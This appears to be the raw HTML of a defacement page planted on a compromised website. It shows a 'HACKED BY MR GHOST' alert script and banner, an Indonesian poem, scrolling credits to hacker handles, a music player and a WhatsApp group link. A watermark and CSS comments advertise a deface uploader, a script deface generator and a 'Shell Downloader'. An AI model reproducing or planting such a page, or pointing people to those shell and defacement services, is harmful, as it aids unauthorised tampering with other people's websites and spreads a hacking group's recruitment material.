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alert("HACKED BY MR GHOST"); </script> <br> <div class="error"> <font color="RED" size="7" face="Chicle">HACKED BY MR GHOST</font> <center> <font color="white" size="7" face="Chicle"> </font> <br> <img style="width:50%" src="https://g.top4top.io/p_2481tdvjl5.jpg"> </center> </div> <font color="red"> <br> <b><font face="courier new" size="6"> Aku diam bukan berarti aku tak mengerti, Tapi aku memberimu ruang untuk memahami Bahwa sebenarnya sosok yang coba kau sakiti Adalah sosok yang sedang berbaik hati. <marquee behavior="scroll" direction="left" scrollamount="90" scrolldelay="40" width="100%"> <font color="green"><<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<</font> </marquee> <div style="text-shadow: 0px 0px 10px green;"> <span style="color: white;"><font face="transformers"><b>Thanks to : <marquee scrollamount="5" direction="left" width="50%"> <span style="color: red;"> <span style="color: red;">XNUXER HELLBOY, BULLY X PLOIT, MR.GHOST, 4L3XIS X PLOIT, MR.WORD 09, MR, D4RK, HCI| ARIS, MR.GZ044, MR.KALONG, 4M3L_CANS, MRS.ARA,DAN SEMUA TEMAN CYBER <span style="color: red;"></span></span></span> </marquee></b></font></span> </div> <b> <marquee behavior="scroll" direction="right" scrollamount="90" scrolldelay="40" width="100%"> <font color="green">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>></font> </marquee> <br> <script> function play(){ var audio = document.getElementById("audio"); audio.play(); } </script> <input type="button" value="PUTAR MUSIC" onclick="play()"> <audio id="audio" src="https://g.top4top.io/m_1776tea230.mp3"></audio> <a href="https://chat.whatsapp.com/KFjM1Gs37um187Ab9q2vIG " class="link-button"></a> <noscript> <i>Member AND LEADER GEORGE SEVEB ?GEORGE SEVEN</i> </noscript> </b></font></b></font></font></font></font> <b><b> <br><br> <a href="https://haxor.my.id/" name="Prinsh.com - Haxor.My.ID" title="Script Deface Uploader" style="background:url("https://haxor.my.id/NathanPrinsley/wm.svg")!important;background-size:cover!important;width:96px!important;height:38px!important;display:block!important;position:fixed!important;bottom:0px!important;right:0px!important;opacity:100%!important;z-index:99999999999;"></a><style> /*-- Uploaded on >> https://haxor.my.id --*/ /*-- Official Web >> https://prinsh.com --*/ /*-- Shell Downloader >> https://shell.prinsh.com --*/ /*-- https://script-deface-generator.prinsh.com --*/</style></b></b> </center> </body> </html>